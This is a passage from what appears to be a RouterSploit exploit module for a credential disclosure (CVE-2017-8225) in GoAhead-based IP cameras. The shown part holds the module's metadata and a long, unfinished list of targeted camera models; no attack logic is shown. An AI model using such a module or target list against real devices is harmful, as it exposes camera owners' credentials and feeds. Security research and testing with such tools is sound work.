from routersploit.core.exploit import *
from routersploit.core.http.http_client import HTTPClient


class Exploit(HTTPClient):
    __info__ = {
        "name": "P2P wificam credential disclosure",
        "description": "A credential disclosure in several cameras which utilize the GoAhead webserver.",
        "authors": (
            "Pierre Kim <pierre.kim.sec@gmail.com>",  # CVE-2017-8225 and others
            "casept <davids.paskevics@gmail.com>",  # routesploit module
        ),
        "references": (
            "https://pierrekim.github.io/blog/2017-03-08-camera-goahead-0day.html",
        ),
        'devices': (
            '3G+IPCam Other',
            '3SVISION Other',
            '3com CASA',
            '3com Other',
            '3xLogic Other',
            '3xLogic Radio',
            '4UCAM Other',
            '4XEM Other',
            '555 Other',
            '7Links 3677',
            '7Links 3677-675',
            '7Links 3720-675',
            '7Links 3720-919',
            '7Links IP-Cam-in',
            '7Links IP-Wi-Fi',
            '7Links IPC-760HD',
            '7Links IPC-770HD',
            '7Links Incam',
            '7Links Other',
            '7Links PX-3615-675',
            '7Links PX-3671-675',
            '7Links PX-3720-675',
            '7Links PX3309',
            '7Links PX3615',
            '7Links ipc-720',
            '7Links px-3675',
            '7Links px-3719-675',
            '7Links px-3720-675',
            'A4Tech Other',
            'ABS Other',
            'ADT RC8021W',
            'AGUILERA AQUILERA',
            'AJT AJT-019129-BBCEF',
            'ALinking ALC',
            'ALinking Other',
            'ALinking dax',
            'AMC Other',
            'ANRAN ip180',
            'APKLINK Other',
            'AQUILA AV-IPE03',
            'AQUILA AV-IPE04',
            'AVACOM 5060',
            'AVACOM 5980',
            'AVACOM H5060W',
            'AVACOM NEW',
            'AVACOM Other',
            'AVACOM h5060w',
            'AVACOM h5080w',
            'Acromedia IN-010',
            'Acromedia Other',
            'Advance Other',
            'Advanced+home lc-1140',
            'Aeoss J6358',
            'Aetos 400w',
            'Agasio A500W',
            'Agasio A502W',
            'Agasio A512',
            'Agasio A533W',
            'Agasio A602W',
            'Agasio A603W',
            'Agasio Other',
            'AirLink Other',
            'Airmobi HSC321',
            'Airsight Other',
            'Airsight X10',
            'Airsight X34A',
            'Airsight X36A',
            'Airsight XC39A',
            'Airsight XX34A',
            'Airsight XX36A',
            'Airsight XX40A',
            'Airsight XX60A',
            'Airsight x10',
            'Airsight x10Airsight',
            'Airsight xc36a',
            'Airsight xc49a',
            'Airsight xx39A',
            'Airsight xx40a',
            'Airsight xx49a',
            'Airsight xx51A',
            'Airsight xx51a',
            'Airsight xx52a',
            'Airsight xx59a',
            'Airsight xx60a',
            'Akai AK7400',
            'Akai SP-T03WP',
            'Alecto 150',
            'Alecto Atheros',
            'Alecto DVC-125IP',
            'Alecto DVC-150-IP',
            'Alecto DVC-1601',
            'Alecto DVC-215IP',
            'Alecto DVC-255-IP',
            'Alecto dv150',
            'Alecto dvc-150ip',
            'Alfa 0002HD',
            'Alfa Other',
            'Allnet 2213',
            'Allnet ALL2212',
            'Allnet ALL2213',
            'Amovision Other',
            'Android+IP+cam IPwebcam',
            'Anjiel ip-sd-sh13d',
            'Apexis AH9063CW',
            'Apexis APM-H803-WS',
            'Apexis APM-H804-WS',
            'Apexis APM-J011',
            'Apexis APM-J011-Richard',
            'Apexis APM-J011-WS',
            'Apexis APM-J012',
            'Apexis APM-J012-WS',
            'Apexis APM-J0233',
            'Apexis APM-J8015-WS',
            'Apexis GENERIC',
            'Apexis H',
            'Apexis HD',
            'Apexis J',
            'Apexis Other',
            'Apexis PIPCAM8',
            'Apexis Pyle',
            'Apexis XF-IP49',
            'Apexis apexis',
            'Apexis apm-',
            'Apexis dealextreme',
            'Aquila+Vizion Other',
            'Area51 Other',
            'ArmorView Other',
            'Asagio A622W',
            'Asagio Other',
            'Asgari 720U',
            'Asgari Other',
            'Asgari PTG2',
            'Asgari UIR-G2',
            'Atheros ar9285',
            'AvantGarde SUMPPLE',
            'Axis 1054',
            'Axis 241S',
            'B-Qtech Other',
            'B-Series B-1',
            'BRAUN HD-560',
            'BRAUN HD505',
            'Beaulieu Other',
            'Bionics Other',
            'Bionics ROBOCAM',
            'Bionics Robocam',
            'Bionics T6892WP',
            'Bionics t6892wp',
            'Black+Label B2601',
            'Bravolink Other',
            'Breno Other',
            'CDR+king APM-J011-WS',
            'CDR+king Other',
            'CDR+king SEC-015-C',
            'CDR+king SEC-016-NE',
            'CDR+king SEC-028-NE',
            'CDR+king SEC-029-NE',
            'CDR+king SEC-039-NE',
            'CDR+king sec-016-ne',
            'CDXX Other',
            'CDXXcamera Any',
            'CP+PLUS CP-EPK-HC10L1',
            'CPTCAM Other',
            'Camscam JWEV-372869-BCBAB',
            'Casa Other',
            'Cengiz Other',
            'Chinavasion Gunnie',
            'Chinavasion H30',
            'Chinavasion IP611W',
            'Chinavasion Other',
            'Chinavasion ip609aw',
            'Chinavasion ip611w',
            'Cloud MV1',
            'Cloud Other',
            'CnM IP103',
            'CnM Other',
            'CnM sec-ip-cam',
            'Compro NC150/420/500',
            'Comtac CS2',
            'Comtac CS9267',
            'Conceptronic CIPCAM720PTIWL',
            'Conceptronic cipcamptiwl',
            'Cybernova Other',
            'Cybernova WIP604',
            'Cybernova WIP604MW',
            'D-Link DCS-910',
            'D-Link DCS-930L',
            'D-Link L-series',
            'D-Link Other',
            'DB+Power 003arfu',
            'DB+Power DBPOWER',
            'DB+Power ERIK',
            'DB+Power HC-WV06',
            'DB+Power HD011P',
            'DB+Power HD012P',
            'DB+Power HD015P',
            'DB+Power L-615W',
            'DB+Power LA040',
            'DB+Power Other',
            'DB+Power Other2',
            'DB+Power VA-033K',
            'DB+Power VA0038K',
            'DB+Power VA003K+',
            'DB+Power VA0044_M',
            'DB+Power VA033K',
            'DB+Power VA033K+',
            'DB+Power VA035K',
            'DB+Power VA036K',
            'DB+Power VA038',
            'DB+Power VA038k',
            'DB+Power VA039K',
            'DB+Power VA039K-Test',
            'DB+Power VA040',
            'DB+Power VA390k',
            'DB+Power b',
            'DB+Power b-series',
            'DB+Power extcams',
            'DB+Power eye',
            'DB+Power kiskFirstCam',
            'DB+Power va033k',
            'DB+Power va039k',
            'DB+Power wifi',
            'DBB IP607W',
            'DEVICECLIENTQ CNB',
            'DKSEG Other',
            'DNT CamDoo',
            'DVR DVR',
            'DVS-IP-CAM Other',
            'DVS-IP-CAM Outdoor/IR',
            'Dagro DAGRO-003368-JLWYX',
            'Dagro Other',
            'Dericam H216W',
            'Dericam H502W',
            'Dericam M01W',
            'Dericam M2/6/8',
            'Dericam M502W',
            'Dericam M601W',
            'Dericam M801W',
            'Dericam Other',
            'Digix Other',
            'Digoo BB-M2',
            'Digoo MM==BB-M2',
            'Digoo bb-m2',
            'Dinon 8673',
            'Dinon 8675',
            'Dinon SEGEV-105',
            'Dinon segev-103',
            'Dome Other',
            'Drilling+machines Other',
            'E-Lock 1000',
            'ENSIDIO IP102W',
            'EOpen Open730',
            'EST ES-IP602IW',
            'EST IP743W',
            'EST Other',
            'EZCam EPK-EP10L1',
            'EZCam EZCam',
            'EZCam Other',
            'EZCam PAN/TILT',
            'EZCam Pan/Tilt',
            'EasyCam EC-101HD',
            'EasyCam EC-101HDSD',
            'EasyCam EC-101SD',
            'EasyCam EC-102',
            'EasyCam Other',
            'EasyN 187',
            'EasyN 1BF',
            'EasyN 720P',
            'EasyN F',
            'EasyN F-136',
            'EasyN F-M136',
            'EasyN F-M166',
            'EasyN F-M181',
            'EasyN F-M1b1',
            'EasyN F-SERIES',
            'EasyN F133',
            'EasyN F2-611B',
            'EasyN F3',
            'EasyN F3-166',
            'EasyN F3-176M',
            'EasyN F3-M166',
            'EasyN F3-SERIES',
            'EasyN F3-Series',
            'EasyN F3-m187',
            'EasyN F3M187',
            'EasyN FS-613A-M136',
            'EasyN FS-613B',
            'EasyN FS-613B-M166',
            'EasyN FS-613B-MJPEG',
            'EasyN FS613',
            'EasyN F_M10R',
            'EasyN H3-V10R',
            'EasyN H6-M137h',
            'EasyN M091',
            'EasyN Other',
            'EasyN est-007660-611b',
            'EasyN est-007660333',
            'EasyN f',
            'EasyN f-Series',
            'EasyN f138',
            'EasyN f_series',
            'EasyN fseries',
            'EasyN kitch',
            'EasyN s',
            'EasySE F/B/N/I',
            'EasySE H3',
            'EasySE H3e',
            'EasySE Other',
            'Ebode IPV38W',
            'Ebode IPV58',
            'Ebode Other',
            'Ego Other',
            'Elro 901',
            'Elro 903',
            'Elro 903IP',
            'Elro C7031P',
            'Elro C703IP2',
            'Elro C704-IP',
            'Elro C704IP',
            'Elro C704IP.2',
            'Elro C704ip',
            'Elro C803IP',
            'Elro C903IP',
            'Elro C903IP.2',
            'Elro C904IP',
            'Elro C904IP.2',
            'Elro IP901',
            'Elro Other',
            'Eminent 6564',
            'Eminent EM6220',
            'Eminent EM6564',
            'Eminent em6220',
            'Esky C5900',
            'Esky L',
            'Esky Live',
            'Esky c5900',
            'Eura-Tech IC-03C3',
            'EyeCam ICAM-608',
            'EyeCam IP65IW',
            'EyeCam Other',
            'EyeCam STORAGEOPTIONS',
            'EyeIPCam IP901W',
            'EyeSight ES-IP607W',
            'EyeSight ES-IP811W',
            'EyeSight ES-IP909IW',
            'EyeSight ES-IP935FW',
            'EyeSight ES-IP935IW',
            'EyeSight IP910IW',
            'EyeSight IP915IW',
            'EyeSight Other',
            'EyeSight ip609IW',
            'EyeSight ip909iw',
            'EyeSight ip915iw',
            'EyeSight mjpeg',
            'EyeSpy247 Other',
            'F-Series FSERIES',
            'F-Series Ip',
            'F-Series Other',
            'F-Series ip',
            'First+Concept Other',
            'Focuscam F19821W',
            'Foscam FI18904w',
            'Foscam FI18905E',
            'Foscam FI18905W',
            'Foscam FI18906w',
            'Foscam FI1890W',
            'Foscam FI18910E',
            'Foscam FI18910W',
            'Foscam FI18910w',
            'Foscam FI18916W',
            'Foscam FI18918W',
            'Foscam FI18919W',
            'Foscam FI19810W',
            'Foscam FI8094W',
            'Foscam FI81904W',
            'Foscam FI8601W',
            'Foscam FI8602W',
            'Foscam FI8606W',
            'Foscam FI8610w',
            'Foscam FI8903W',
            'Foscam FI8903W_Elita',
            'Foscam FI8904',
            'Foscam FI8904W',
            'Foscam FI8905E',
            'Foscam FI8905W',
            'Foscam FI8905w',
            'Foscam FI8906w',
            'Foscam FI8907W',
            'Foscam FI8908W',
            'Foscam FI8909W',
            'Foscam FI890W',
            'Foscam FI8910',
            'Foscam FI8910E',
            'Foscam FI8910W',
            'Foscam FI8910W_DW',
            'Foscam FI8910w',
            'Foscam FI8916W',
            'Foscam FI8918',
            'Foscam FI89180w',
            'Foscam FI8918E',
            'Foscam FI8918W',
            'Foscam FI8918w',
            'Foscam FI8919W',
            'Foscam FI9804W',
            'Foscam FI9805E',
            'Foscam FI9810',
            'Foscam FI9810W',
            'Foscam FI9818',
            'Foscam FI9820w',
            'Foscam FI9821W',
            'Foscam FI9821w',
            'Foscam FL8910',
            'Foscam FS18908W',
            'Foscam FS8910',
            'Foscam Fi8910',
            'Foscam Other',
            'Foscam fI8989w',
            'Foscam fi1890w',
            'Foscam fl8910w',
            'FoxCam PTZ2084-L',
            'GIGA gb',
            'GT+ROAD HS-006344-SPSLM',
            'General Other',
            'Generic All-in-one',
            'Generic Billy',
            'Generic DomeA-Outdoor',
            'Generic IP',
            'Generic Other',
            'Gi-star+srl IP6031W',
            'Gigaeye GB',
            'GoAhead EC-101SD',
            'GoAhead GoAheadWebs',
            'GoAhead IPCAM1',
            'GoAhead IPCAM2',
            'GoAhead Other',
            'GoAhead thedon',
            'GoCam Other',
            'Goclever EYE',
            'Goclever EYE2',
            'Gotake GTK-TH01B',
            'H+264+network+DVR 720p',
            'H+264+network+DVR Other',
            'H.264 Other',
            'H6837WI Other',
            'HD+IPC Other',
            'HD+IPC SV3C',
            'HDIPCAM Other',
            'Heden CAMH04IPWE',
            'Heden CAMHED02IPW',
            'Heden CAMHED04IP',
            'Heden CAMHED04IPWN',
            'Heden CAMHEDIPWP',
            'Heden Other',
            'Heden VisionCam',
            'Heden visionCam',
            'HiSilicon Other',
            'Hikvision DS-2CD2132',
            'Histream RTSP',
            'HooToo F-SERIES',
            'HooToo HOOTOO',
            'HooToo HT-IP006',
            'HooToo HT-IP006N',
            'HooToo HT-IP009HDP',
            'HooToo HT-IP206',
            'HooToo HT-IP207F',
            'HooToo HT-IP210HDP',
            'HooToo HT-IP210P',
            'HooToo HT-IP212',
            'HooToo IP009HDP',
            'HooToo Other',
            'HooToo apm-h803-mpc',
            'Hsmartlink Other',
            'Hungtek WIFI',
            'ICAMView Other',
            'ICam I908W',
            'ICam IP-1',
            'ICam Other',
            'ICam Other2',
            'ICam dome',
            'INISOFT-CAM Stan',
            'INSTAR 4010',
            'INVID Other',
            'IO+Data Other',
            'IP66 Other',
            'IPC IPC02',
            'IPC Other',
            'IPC S5030-TF',
            'IPC S5030-m',
            'IPC SRICAM',
            'IPCC 3XPTZ',
            'IPCC 7210W',
            'IPCC IPCC-7210W',
            'IPCC x01',
            'IPTeles Other',
            'IPUX ip-100',
            'ISIT Other',
            'IZOtech Other',
            'IZTOUCH 0009',
            'IZTOUCH A001',
            'IZTOUCH IZ-009',
            'IZTOUCH LTH-A8645-c15',
            'IZTOUCH Other',
            'IZTOUCH Other1',
            'IZTOUCH ap001',
            'IeGeek Other',
            'IeGeek ukn',
            'Inkovideo V-104',
            'Iprobot3 Other',
            'JRECam JM3866W',
            'JWcam JWEV',
            'JWcam Other',
            'Jaycar 3834',
            'Jaycar 720P',
            'Jaycar Other',
            'Jaycar QC-3831',
            'Jaycar QC-3832',
            'Jaycar QC-3834',
            'Jaycar QC-3836',
            'Jaycar QC-3839',
            'Jaytech IP6021W',
            'JhempCAM Back',
            'JhempCAM Other',
            'KaiKong 1601',
            'KaiKong 1602w',
            'KaiKong Other',
            'KaiKong SIP',
            'KaiKong SIP1602',
            'KaiKong SIP1602W',
            'KaiKong sip',
            'KaiKong sip1602w',
            'Kenton gjc02',
            'Kinson C720PWIP',
            'Klok Other',
            'Knewmart KW01B',
            'Knewmart KW02B',
            'Kogan KAIPC01BLKA',
            'Kogan KAIPCO1BLKA',
            'Kogan Other',
            'Kogan encoder',
            'Kogan kaipc01blkb',
            'Kompernass IUK',
            'Koolertron Other',
            'Koolertron PnP',
            'Koolertron SP-SHEX21-SL',
            'LC+security Other',
            'LW lw-h264tf',
            'LYD H1385H',
            'Lager Other',
            'Leadtek C351',
            'LevelOne 1010/2010',
            'Libor Other',
            'LifeTech MyLifeTech',
            'LifeTech Other',
            'LifeTech dd',
            'Lilly Other',
            'Linq Other',
            'Lloyds 1107',
            'Loftek CXS',
            'Loftek Nexus',
            'Loftek Other',
            'Loftek SPECTOR',
            'Loftek Sendinel',
            'Loftek Sentinel',
            'LogiLink WC0030A',
            'LogiLink wc0044',
            'Logitech C920',
            'MCL 610',
            'MJPEG Other',
            'Maginon 100',
            'Maginon 10AC',
            'Maginon 20C',
            'Maginon IP-20c',
            'Maginon IPC',
            'Maginon IPC-1',
            'Maginon IPC-10',
            'Maginon IPC-100',
            'Maginon IPC-100AC',
            'Maginon IPC-10AC',
            'Maginon IPC-2',
            'Maginon IPC-20',
            'Maginon IPC20C',
            'Maginon IPC_1A',
            'Maginon Other',
            'Maginon SUPRA',
            'Maginon Supra',
            'Maginon ipc',
            'Maginon ipc-1a',
            'Maginon ipc100a',
            'Maginon ipx',
            'Maginon w2',
            'Marmitek GM-8126',
            'Maygion IP',
            'Maygion OTHER2',
            'Maygion Other',
            'Maygion V3',
            'Maygion black',
            'Mediatech mt4050',
            'Medisana SmartBabyMonitor',
            'Merlin IP',
            'Merlin Other',
            'Merlin vstc',
            'Messoa Other',
            'Mingyoushi S6203Y-WR',
            'Momentum 2002',
            'Momentum MO-CAM',
            'NEXCOM S-CAM',
            'NIP NIP-004500-KMTLU',
            'NIP NIP-075007-UPHTF',
            'NIP NIP-11BGPW',
            'NIP NIP-14',
            'NTSE Other',
            'Neewer Other',
            'Neewer V-100',
            'Neo+CoolCam NIP',
            'Neo+CoolCam NIP-02(OAM)',
            'Neo+CoolCam NIP-06',
            'Neo+CoolCam NIP-066777-BWESL',
            'Neo+CoolCam NIP-102428-DFBEF',
            'Neo+CoolCam NIP-H20(OZX)',
            'Neo+CoolCam OBJ-007260-LYLDU',
            'Neo+CoolCam Other',
            'Neo+CoolCam neo',
            'Neo+CoolCam nip-11',
            'Neo+CoolCam nip-20',
            'Ness Other',
            'NetView Other',
            'Netcam Dual-HD',
            'Netcam HSL-232245-CWXES',
            'Netcam OUVIS',
            'Netcam Other',
            'Netware Other',
            'Nexxt+Solution Xpy',
            'Nixzen Other',
            'NorthQ NQ-9006',
            'Office+One CM-I11123BK',
            'Office+One IP-900',
            'Office+One IP-99',
            'Office+One Other',
            'Office+One SC-10IP',
            'Office+One ip-900',
            'Office+One ip900',
            'Opexia OPCS',
            'Optica+Video FI-8903W',
            'Optica+Video FI-8918W',
            'Optica+Video Other',
            'Otto 4eye',
            'Overmax CamSpot',
            'Overmax Camspot',
            'OwlCam CP-6M201W',
            'P2p wificam',
            'PCS Other',
            'Panasonic BL-C131A',
            'PeopleFu IPC-674',
            'PeopleFu IPCAM1',
            'PeopleFu IPCAM2',
            'PeopleFu IPCAM3',
            'PeopleFu IPCAM5',
            'Pixpo 1Z074A2A0301627785',
            'Pixpo PIX006428BFYZY',
            'Pixpo PIX009491MLJYM',
            'Pixpo PIX009495HURFE',
            'Pixpo PIX010584DFACE',
            'Plaisio IP',
            'Planex Other',
            'Planex PLANEX',
            'Polariod P351S',
            'Polaroid IP-100',
            'Polaroid IP-101W',
            'Polaroid IP-200B',
            'Polaroid IP-201B',
            'Polaroid IP-350',
            'Polaroid IP-351S',
            'Polaroid IP-360S',
            'Polaroid IP-810W',
            'Polaroid IP-810WZ',
            'Polaroid Other',
            'Polaroid POLIP101W',
            'Polaroid POLIP201B',
            'Polaroid POLIP201W',
            'Polaroid POLIP351S',
            'Polaroid POLIP35i5',
            'PowerLead Caue',
            'PowerLead PC012',
            'ProveCam IP2521',
            'Provision 717',
            'Provision F-717',
            'Provision F-737',
            'Provision PT-737',
            'Provision WP-711',
            'Provision WP-717P',
            'Pyle HD',
            'Pyle HD22',
            'Pyle HD46',
            'Pyle Mine',
            'Pyle PIPCAM15',
            'Pyle Pipcam12',
            'Pyle cam5',
            'Pyle pipcam25',
            'Pyle pipcam5',
            'Q-nest QN-100S',
            'Q-nest qn-100s',
            'Queback 720p',
            'ROCAM NC-400',
            'ROCAM NC-500',
            'ROCAM NC300',
            'ROCAM NC300-1',
            'ROHS IP',
            'ROHS none',
            'RTX 06R',
            'RTX DVS',
            'RTX IP-06R',
            'RTX IP-26H',
            'RTX Other',
            'Rollei safetycam-10hd',
            'SES Other',
            'SKJM Other',
            'SST SST-CNS-BUI18',
            'SVB+International SIP-018262-RYERR',
            'SafeHome 278042',
            'SafeHome 616-W',
            'SafeHome IP601W-hd',
            'SafeHome Other',
            'SafeHome VGA',
            'SafeHome iprobot',
            'Samsung Other',
            'Santec-Video Other',
            'Sarotech IPCAM-1000',
            'Sarotech ip300',
            'Scricam 004',
            'Scricam 192.168.1.7',
            'Scricam AP-004',
            'Scricam AP-009',
            'Scricam AP0006',
            'Scricam AP006',
            'Secam+CCTV IPCAM',
            'Secam+CCTV Other',
            'Seculink 10709',
            'Seculink Other',
            'Secur+Eye xxc5330',
            'Seisa JK-H616WS',
            'Senao PTZ-01H',
            'Sequrecam Other',
            'Sequrecam PNP-125',
            'Sercomm Other',
            'Shenwhen+Neo+Electronic+Co NC-541',
            'Shenwhen+Neo+Electronic+Co Other',
            'Shenwhen+Neo+Electronic+Co X-5000B',
            'Shenzhen 720P',
            'Shixin+China IP-129HW',
            'Siepem IPC',
            'Siepem S5001Y-BW',
            'Siepem S6203y',
            'Siepem S6211Y-WR',
            'Simi+IP+Camera+Viewer Other',
            'Sineoji Other',
            'Sineoji PT-315V',
            'Sineoji PT-3215P',
            'Sineoji PT-325IP',
            'Sinocam Other',
            'Sky+Genious Genious',
            'Skytronic IP',
            'Skytronic IP99',
            'Skytronic Other',
            'Skytronic WiFi',
            'Skytronic dome',
            'SmartEye Other',
            'SmartWares C723IP',
            'SmartWares c724ip',
            'SmartWares c923ip',
            'SmartWares c924ip',
            'Solwise SEC-1002W-IR',
            'Spy+Cameras WF-100PCX',
            'Spy+Cameras WF-110V',
            'Sricam 0001',
            'Sricam 004',
            'Sricam A0009',
            'Sricam A001',
            'Sricam AP-001',
            'Sricam AP-003',
            'Sricam AP-004',
            'Sricam AP-005',
            'Sricam AP-006',
            'Sricam AP-009',
            'Sricam AP-012',
            'Sricam AP-CAM',
            'Sricam AP0009',
            'Sricam AP002',
            'Sricam AP995',
            'Sricam Cam1',
            'Sricam Front',
            'Sricam Home',
            'Sricam Other',
            'Sricam SP005',
            'Sricam SP012',
            'Sricam SP013',
            'Sricam SP015',
            'Sricam SRICAM',
            'Sricam SRICAM1',
            'Sricam aj-c2wa-c118',
            'Sricam ap',
            'Sricam ap006',
            'Sricam ap1',
            'Sricam h.264',
            'Sricam sp013',
            'Sricctv A-0006',
            'Sricctv A-009',
            'Sricctv AJ-006',
            'Sricctv AP-0001',
            'Sricctv AP-0005',
            'Sricctv AP-0009',
            'Sricctv AP-001',
            'Sricctv AP-002',
            'Sricctv AP-003',
            'Sricctv AP-004',
            'Sricctv AP-004AF',
            'Sricctv AP-005',
            'Sricctv AP-006',
            'Sricctv AP-007',
            'Sricctv AP-008',
            'Sricctv AP-009',
            'Sricctv AP-011',
            'Sricctv AP-014',
            'Sricctv H-264',
            'Sricctv Other',
            'Sricctv P2P-BLACK',
            'Sricctv P2P-Black',
            'Sricctv SP-007',
            'Sricctv SR-001',
            'Sricctv SR-004',
            'Star+Vedia 6836',
            'Star+Vedia 7837-WIP',
            'Star+Vedia C-7835WIP',
            'Star+Vedia Other',
            'Star+Vedia T-6836WTP',
            'Star+Vedia T-7833WIP',
            'Star+Vedia T-7837WIP',
            'Star+Vedia T-7838WIP',
            'StarCam C33-X4',
            'StarCam EY4',
            'StarCam F6836W',
            'StarCam Other',
            'StarCam c7837wip',
            'Stipelectronics Other',
            'Storage+Options HOMEGUARD',
            'Storage+Options Other',
            'Storage+Options SON-IPC1',
            'Sumpple 610',
            'Sumpple 610S',
            'Sumpple 631',
            'Sumpple 960P',
            'Sumpple S601',
            'Sumpple S610',
            'Sumpple S631',
            'Sumpple S651',
            'Sumpple qd300',
            'Sumpple s631',
            'SunVision+US Other',
            'Sunbio Other',
            'Suneyes Other',
            'Suneyes SP-T01EWP',
            'Suneyes SP-T01WP',
            'Suneyes SP-TM01EWP',
            'Suneyes SP-TM01WP',
            'Suneyes SP-tm05wp',
            'Sunluxy H-264',
            'Sunluxy HZCam',
            'Sunluxy Other',
            'Sunluxy PTZ',
            'Sunluxy SL-701',
            'Supra+Space IPC',
            'Supra+Space IPC-1',
            'Supra+Space IPC-100AC',
            'Supra+Space IPC-10AC',
            'Supra+Space Other11',
            'Supra+Space ipc-20c',
            'Sure-Eye Other',
            'Surecom LN-400',
            'Swann 005FTCD',
            'Swann 440',
            'Swann 440-IPC',
            'Swann ADS-440',
            'Swann ADS-440-PTZ',
            'Swann ADS-CAMAX1',
            'Swann Other',
            'Swann SWADS-440-IPC',
            'Swann SWADS-440IPC-AU',
            'Sygonix 43176A',
            'Sygonix 43558A',
            'Szneo CAM0X',
            'Szneo CoolCam',
            'Szneo NIP',
            'Szneo NIP-0',
            'Szneo NIP-02',
            'Szneo NIP-031',
            'Szneo NIP-031H',
            'Szneo NIP-06',
            'Szneo NIP-12',
            'Szneo NIP-2',
            'Szneo NIP-20',
            'Szneo NIP-210485-ABABC',
            'Szneo NIP-26',
            'Szneo NIP-X',
            'Szneo NP-254095',
            'Szneo Other',
            'Szneo TFD',
            'TAS-Tech Other',
            'Technaxx tx-23',
            'Techview GM8126',
            'Techview QC-3638',
            'Techview qc3839',
            'Temvis Other',
            'Tenda C50S',
            'Tenda c30',
            'Tenda c5+',
            'Tenvis 0012',
            'Tenvis 3815',
            'Tenvis 3815-W',
            'Tenvis 3815W',
            'Tenvis 3815W.',
            'Tenvis 3815W2013',
            'Tenvis IP-319W',
            'Tenvis IP-319w',
            'Tenvis IP-391W',
            'Tenvis IP-391WHD',
            'Tenvis IP-602W',
            'Tenvis IP602W',
            'Tenvis IPROBOT',
            'Tenvis JP-3815W',
            'Tenvis JPT-3814WP2P',
            'Tenvis JPT-3815',
            'Tenvis JPT-3815-P2P',
            'Tenvis JPT-3815W',
            'Tenvis JPT-3815W+',
            'Tenvis JPT-3815WP2P',
            'Tenvis JPT-3815w',
            'Tenvis JPT-3818',
            'Tenvis MINI-319W',
            'Tenvis Mini-319',
            'Tenvis Other',
            'Tenvis PT-7131W',
            'Tenvis TH-661',
            'Tenvis TR-3818',
            'Tenvis TR-3828',
            'Tenvis TR3815W',
            'Tenvis TZ100',
            'Tenvis TZ100/IPROBOT3',
            'Tenvus JPG3815W',
            'Threeboy IP-660',
            'Topcam SL-30IPC01Z',
            'Topcam SL-720IPC02Z',
            'Topcam SL-910IW30',
            'Topica+CCTV Other',
            'Trivision NC-335PW-HD-10',
            'Trust NW-7500',
            'Turbo+X Endurance',
            'Turbo+X IIPC-20',
            'Uokoo 720P',
            'VCatch Other',
            'VCatch VC-MIC720HK',
            'Valtronics IP',
            'Valtronics Other',
            'Vandesc IP900',
            'Vantech Other',
            'Vantech PTZ',
            'Videosec+Security IPC-103',
            'Videosec+Security IPP-105',
            'Vimicro Other',
            'Vitek+CCTV Other',
            'Vstarcam 7823',
            'Vstarcam C-7824WIP',
            'Vstarcam C-7833WIP-X4',
            'Vstarcam C-7833wip',
            'Vstarcam C-7837WIP',
            'Vstarcam C-7838WIP',
            'Vstarcam C50S',
            'Vstarcam C7816W',
            'Vstarcam C7824WIP',
            'Vstarcam C782WIP',
            'Vstarcam C7842WIP',
            'Vstarcam C93',
            'Vstarcam C=7824WIP',
            'Vstarcam Cam360',
            'Vstarcam F-6836W',
            'Vstarcam H-6837WI',
            'Vstarcam H-6837WIP',
            'Vstarcam H-6850',
            'Vstarcam H-6850WIP',
            'Vstarcam H-6850wip',
            'Vstarcam ICAM-608',
            'Vstarcam Other',
            'Vstarcam T-6835WIP',
            'Vstarcam T-6836WTP',
            'Vstarcam T-6892wp',
            'Vstarcam T-7815WIP',
            'Vstarcam T-7833WIP',
            'Vstarcam T-7833wip',
            'Vstarcam T-7837WIP',
            'Vstarcam T-7838WIP',
            'Vstarcam T-7892WIP',
            'Vstarcam T6836WTP',
            'Vstarcam T7837WIP',
            'Vstarcam c7815wip',
            'Vstarcam c7833wip',
            'Vstarcam c7850wip',
            'Wanscam 00D6FB01980F',
            'Wanscam 106B',
            'Wanscam 118',
            'Wanscam 541-W',
            'Wanscam 543-W',
            'Wanscam 790',
            'Wanscam AJ-C0WA-198',
            'Wanscam AJ-C0WA-B106',
            'Wanscam AJ-C0WA-B116',
            'Wanscam AJ-C0WA-B168',
            'Wanscam AJ-C0WA-B1D8',
            'Wanscam AJ-C0WA-C0D8',
            'Wanscam AJ-C0WA-C116',
            'Wanscam AJ-C0WA-C126',
            'Wanscam AJ-C2WA-B118',
            'Wanscam AJ-C2WA-C116',
            'Wanscam AJ-C2WA-C118',
            'Wanscam AJ-C2WA-C198',
            'Wanscam AJ-COWA-B1D8',
            'Wanscam AJ-COWA-C116',
            'Wanscam AJ-COWA-C126',
            'Wanscam AJ-COWA-C128',
            'Wanscam AW00004J',
            'Wanscam B1D8-1',
            'Wanscam C-118',
            'Wanscam C-126',
            'Wanscam Colour',
            'Wanscam FI-18904w',
            'Wanscam FR-4020A2',
            'Wanscam FR4020A2',
            'Wanscam HD-100W',
            'Wanscam HW-0021',
            'Wanscam HW-0022',
            'Wanscam HW-0022HD',
            'Wanscam HW-0023',
            'Wanscam HW-0024',
            'Wanscam HW-0025',
            'Wanscam HW-0026',
            'Wanscam HW-0028',
            'Wanscam HW-0033',
            'Wanscam HW-0036',
            'Wanscam HW-0038',
            'Wanscam HW-0039',
            'Wanscam HW-22',
            'Wanscam HW0030',
            'Wanscam IP',
            'Wanscam JW-0001',
            'Wanscam JW-0003',
            'Wanscam JW-0004',
            'Wanscam JW-0004m',
            'Wanscam JW-0005',
            'Wanscam JW-0006',
            'Wanscam JW-0008',
            'Wanscam JW-0009',
            'Wanscam JW-0010',
            'Wanscam JW-0011',
            'Wanscam JW-0011l',
            'Wanscam JW-0012',
            'Wanscam JW-0018',
            'Wanscam JW-004',
            'Wanscam JW-009',
            'Wanscam JW-CD',
            'Wanscam JW000008',
            'Wanscam JW0009',
            'Wanscam JW001',
            'Wanscam JW0012',
            'Wanscam JW008',
            'Wanscam JWEV',
            'Wanscam JWEV-011777-NSRVV',
            'Wanscam JWEV-011921-RXSXT',
            'Wanscam JWEV-360171-BBEAC',
            'Wanscam JWEV-380096-CECDB',
            'Wanscam JWEV-PEPLOW',
            'Wanscam NBC-543W',
            'Wanscam NC-530',
            'Wanscam NC-541',
            'Wanscam NC-541/W',
            'Wanscam NC-541W',
            'Wanscam NC-541w',
            'Wanscam NC-543W',
            'Wanscam NCB-534W',
            'Wanscam NCB-540W',
            'Wanscam NCB-541W',
            'Wanscam NCB-541WB',
            'Wanscam NCB-543W',
            'Wanscam NCBL-618W',
            'Wanscam NCH-532MW',
            'Wanscam NCL-610W',
            'Wanscam NCL-612W',
            'Wanscam NCL-616W',
            'Wanscam NCL-S616W',
            'Wanscam Other',
            'Wanscam TG-002',
            'Wanscam WJ-0004',
            'Wanscam WX-617',
            'Wanscam Works',
            'Wanscam XHA-120903181',
            'Wanscam XHA-4020a2',
            'Wanscam __PTZ',
            'Wanscam chiOthernese',
            'Wanscam ip',
            'Wanscam jw0005',
            'Wanscam jw0010',
            'Wansview 541',
            'Wansview 625W',
